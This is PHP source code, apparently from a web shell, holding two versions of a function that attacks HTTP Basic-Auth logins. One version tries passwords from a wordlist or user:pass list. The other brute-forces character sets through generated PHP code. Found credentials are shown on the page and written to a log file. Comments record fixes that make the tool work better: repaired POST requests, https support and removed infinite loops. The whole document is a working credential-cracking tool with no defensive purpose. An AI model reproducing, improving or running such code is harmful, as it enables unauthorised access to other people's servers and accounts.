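function authcrackeR() {
    // HTTP Basic-Auth dictionary attack (first-generation variant).
    // Every input -- target, dictionary path, username, log path -- comes
    // straight from the request. The dictionary goes to fopen() unfiltered (a
    // local path, or any stream wrapper when allow_url_fopen is on) and the
    // log is appended wherever 'logfilE' points. That is this tool's design;
    // it must only be reachable by whoever is meant to hold that capability.
    global $errorbox, $et, $t, $hcwd;

    if (empty($_REQUEST['target']) || empty($_REQUEST['dictionary'])) {
        // No job submitted: render the form (markup unchanged).
        echo "<center><form method='POST' name=form>{$t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> {$hcwd} <input class=buttons type=submit value=Start></form>{$et}</center>";
        return;
    }

    $log    = isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE']);
    $file   = $log ? $_REQUEST['logfilE'] : '';
    $method = !empty($_REQUEST['method']) ? 'POST' : 'GET';
    $combo  = !empty($_REQUEST['combo']);   // dictionary lines are "user:pass"
    $user   = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';

    // "target?query": the query becomes the POST body, or is re-attached to
    // the path for GET. The original appended it without the '?', so the GET
    // variant requested a different URL than the one typed in.
    $target = $_REQUEST['target'];
    $data   = '';
    $qpos   = strpos($target, '?');
    if ($qpos !== false) {
        $data   = substr($target, $qpos + 1);
        $target = substr($target, 0, $qpos);
    }
    spliturL($target, $host, $page);   // defined elsewhere in this file
    if ($method === 'GET') {
        if ($data !== '') {
            $page .= '?' . $data;
        }
        $data = '';   // a GET carries no body
    }

    // An fopen() failure previously fell into an endless feof()/fgets() loop.
    $dictionary = @fopen($_REQUEST['dictionary'], 'r');
    if ($dictionary === false) {
        echo "{$errorbox} Can not open dictionary{$et}";
        return;
    }

    echo '<font color=blue>';
    while (($line = fgets($dictionary)) !== false) {
        $line = trim($line, " \n\r");
        if ($combo) {
            $sep = strpos($line, ':');
            if ($sep === false) {
                continue;   // not a user:pass entry
            }
            $user = substr($line, 0, $sep);
            $pass = substr($line, $sep + 1);
        } else {
            $pass = $line;
        }

        $so = @fsockopen($host, 80, $en, $es, 5);   // plain HTTP on port 80 only
        if (!$so) {
            echo "{$errorbox} Can not connect to host{$et}";
            break;
        }

        // One request per candidate. The POST headers used to be glued onto the
        // Authorization line and written with a single-quoted '\r\n' (literal
        // backslashes), so POST mode sent a malformed request. Every header now
        // ends in a real CRLF and the blank line terminates the header block.
        $packet = "{$method} /{$page} HTTP/1.0\r\n"
                . "Accept-Encoding: text\r\n"
                . "Host: {$host}\r\n"
                . "Referer: {$host}\r\n"
                . "Connection: Close\r\n"
                . 'Authorization: Basic ' . base64_encode("{$user}:{$pass}") . "\r\n";
        if ($method === 'POST') {
            $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"
                     . 'Content-Length: ' . strlen($data) . "\r\n";
        }
        $packet .= "\r\n" . $data;
        fputs($so, $packet);
        $status = fgets($so);
        fclose($so);

        // Any 2xx counts as a hit (wrong credentials yield 401). A server that
        // answers a successful login with a 3xx is not recognised here.
        if ($status !== false && preg_match('#^HTTP/\d\.\d\s+2\d\d#', $status)) {
            $hit = "U: {$user} P: {$pass}";
            echo htmlspecialchars($hit, ENT_QUOTES) . '</br>';   // dictionary content is untrusted markup
            if ($log) {
                file_add_contentS($file, $hit . "\r\n");   // defined elsewhere in this file
            }
        }
    }
    fclose($dictionary);
    echo 'Done!</font>';
}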
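function authcrackeR() {
    // HTTP Basic-Auth cracker (second-generation variant): wordlist mode, or a
    // character-set brute force delegated to brute() via generated PHP code.
    // Every input -- target URL, dictionary path, username, log path, charset
    // bounds -- comes straight from the request; the dictionary goes to fopen()
    // unfiltered and the log is appended wherever 'logfilE' points. That is the
    // tool's design; it must only be reachable by whoever is meant to have it.
    global $hcwd;

    if (empty($_REQUEST['target'])) {
        // No job submitted: render the form. HTTP_HOST is the client-supplied
        // Host header, so it is escaped before landing in an attribute.
        echo ' <form name=cracker method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">HTTP Auth cracker</label> </div><div class="fieldwrapper"> <label class="styled">Target:</label> <div class="thefield"> <input type="url" name="target" value="http://' . htmlspecialchars((string) getenv('HTTP_HOST'), ENT_QUOTES) . '/admin/" size="30" /> </div> </div> <div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield"> <select name="mode" id="mode" onChange="toggle()"> <option value="09">Bruteforce [0-9]</option> <option value="az">Bruteforce [a-z]</option> <option value="az09">Bruteforce [a-z] [0-9]</option> <option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option> <option value="all">Bruteforce [ALL]</option> <option value="wl">Wordlist</option> </select> </div></div> <div class="fieldwrapper" id="dic"> <label class="styled">Dictionary:</label> <div class="thefield"> <input type="text" name="dictionary" size="30" /> </div> </div><div class="fieldwrapper" id="fcr"> <label class="styled">Dictionary type:</label> <div class="thefield"> <ul style="margin-top:0;"> <li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li> <li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li> </ul> </div> </div> <div class="fieldwrapper"> <label class="styled">Method:</label> <div class="thefield"> <select name="method"><option selected value="1">POST</option><option value="0">GET</option></select> </div> </div><div class="fieldwrapper"> <label class="styled">Username:</label> <div class="thefield"> <input type="text" name="user" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label> <div class="thefield"> <input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log"> </div> </div> ' . $hcwd . ' <div class="buttonsdiv"> <input type="submit" name="start" value="Start" style="margin-left: 150px;" /> </div> </form><script>toggle();</script>';
        return;
    }

    $log    = isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE']);
    $file   = $log ? $_REQUEST['logfilE'] : '';
    $method = !empty($_REQUEST['method']) ? 'POST' : 'GET';
    $combo  = !empty($_REQUEST['combo']);   // dictionary lines are "user:pass"
    $user   = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
    $mode   = isset($_REQUEST['mode']) ? $_REQUEST['mode'] : '';

    // "target?query": the query becomes the POST body, or is re-attached to
    // the path for GET (the original dropped the '?' when re-attaching).
    $target = $_REQUEST['target'];
    $data   = '';
    $qpos   = strpos($target, '?');
    if ($qpos !== false) {
        $data   = substr($target, $qpos + 1);
        $target = substr($target, 0, $qpos);
    }

    // A bare "host/path" has no scheme, so parse_url() yields no host; retry
    // with http:// so the field accepts what the form's placeholder suggests.
    $u = parse_url($target);
    if (!is_array($u) || !isset($u['host'])) {
        $u = parse_url('http://' . $target);
    }
    $host      = (is_array($u) && isset($u['host'])) ? $u['host'] : '';
    $page      = (is_array($u) && isset($u['path']) && $u['path'] !== '') ? $u['path'] : '/';
    $scheme    = (is_array($u) && isset($u['scheme'])) ? strtolower($u['scheme']) : 'http';
    $transport = $scheme === 'https' ? 'ssl://' : '';   // ssl:// needs the openssl extension
    $port      = (is_array($u) && isset($u['port'])) ? (int) $u['port'] : ($scheme === 'https' ? 443 : 80);

    if ($method === 'GET') {
        if ($data !== '') {
            $page .= '?' . $data;
        }
        $data = '';   // a GET carries no body
    }

    // Fixed request prefix shared by both modes; every header ends in a real
    // CRLF (the original POST path used a single-quoted '\r\n' and glued the
    // body headers onto the Authorization line).
    $headers = "{$method} {$page} HTTP/1.0\r\n"
             . "Accept-Encoding: text\r\n"
             . "Host: {$host}\r\n"
             . "Referer: {$host}\r\n"
             . "Connection: Close\r\n";
    $tail = "\r\n";   // blank line that terminates the header block
    if ($method === 'POST') {
        $tail = "Content-Type: application/x-www-form-urlencoded\r\n"
              . 'Content-Length: ' . strlen($data) . "\r\n\r\n" . $data;
    }

    echo '<font color=#FA0>';
    if ($mode === 'wl') {
        // An fopen() failure used to fall into an endless feof()/fgets() loop.
        $dictionary = empty($_REQUEST['dictionary']) ? false : @fopen($_REQUEST['dictionary'], 'r');
        if ($dictionary === false) {
            echo 'Can not open dictionary<br />';
        } else {
            while (($line = fgets($dictionary)) !== false) {
                $line = trim($line, " \n\r");
                if ($combo) {
                    $sep = strpos($line, ':');
                    if ($sep === false) {
                        continue;   // not a user:pass entry
                    }
                    $user = substr($line, 0, $sep);
                    $pass = substr($line, $sep + 1);
                } else {
                    $pass = $line;
                }

                $so = @fsockopen($transport . $host, $port, $en, $es, 5);
                if (!$so) {
                    echo 'Can not connect to host';
                    break;
                }
                $packet = $headers
                        . 'Authorization: Basic ' . base64_encode("{$user}:{$pass}") . "\r\n"
                        . $tail;
                fputs($so, $packet);
                $status = fgets($so);
                fclose($so);

                // Any 2xx counts as a hit (wrong credentials yield 401). A server
                // that answers a successful login with a 3xx is not recognised.
                if ($status !== false && preg_match('#^HTTP/\d\.\d\s+2\d\d#', $status)) {
                    $hit = "U: {$user} P: {$pass}";
                    echo htmlspecialchars($hit, ENT_QUOTES) . '</br>';   // dictionary content is untrusted markup
                    if ($log) {
                        file_add_contentS($file, $hit . "\r\n");   // defined elsewhere in this file
                    }
                }
            }
            fclose($dictionary);
        }
    } else {
        // Brute-force mode: hand brute() (defined elsewhere) a PHP snippet that
        // it evidently runs once per candidate with $word bound and then reads
        // $test from -- confirm against brute() itself. The snippet embeds host,
        // user and body via var_export() so they cannot break the generated
        // syntax; the original spliced the raw body in outside any string
        // literal and never emitted the header-terminating blank line.
        $code = '$so = @fsockopen(' . var_export($transport . $host, true) . ', ' . $port . ', $en, $es, 5);'
              . ' if (!$so) { $test = false; } else {'
              . ' $packet = ' . var_export($headers, true)
              . ' . "Authorization: Basic " . base64_encode(' . var_export($user . ':', true) . ' . $word) . "\r\n"'
              . ' . ' . var_export($tail, true) . ';'
              . ' fputs($so, $packet); $line = fgets($so); fclose($so);'
              . ' $test = ($line !== false && preg_match(\'#^HTTP/\d\.\d\s+2\d\d#\', $line) === 1); }';

        $min = isset($_REQUEST['min']) ? $_REQUEST['min'] : null;
        $max = isset($_REQUEST['max']) ? $_REQUEST['max'] : null;
        // The original wrote `if ($res = brute(...) != null)`, which assigned
        // the boolean result of the comparison to $res and printed "user:1".
        $res = brute($mode, $min, $max, $code);
        if ($res !== null && $res !== false && $res !== '') {
            echo '<b>' . htmlspecialchars("{$user}:{$res}", ENT_QUOTES) . '</b><br />';
        }
    }
    echo 'Done!</font>';
}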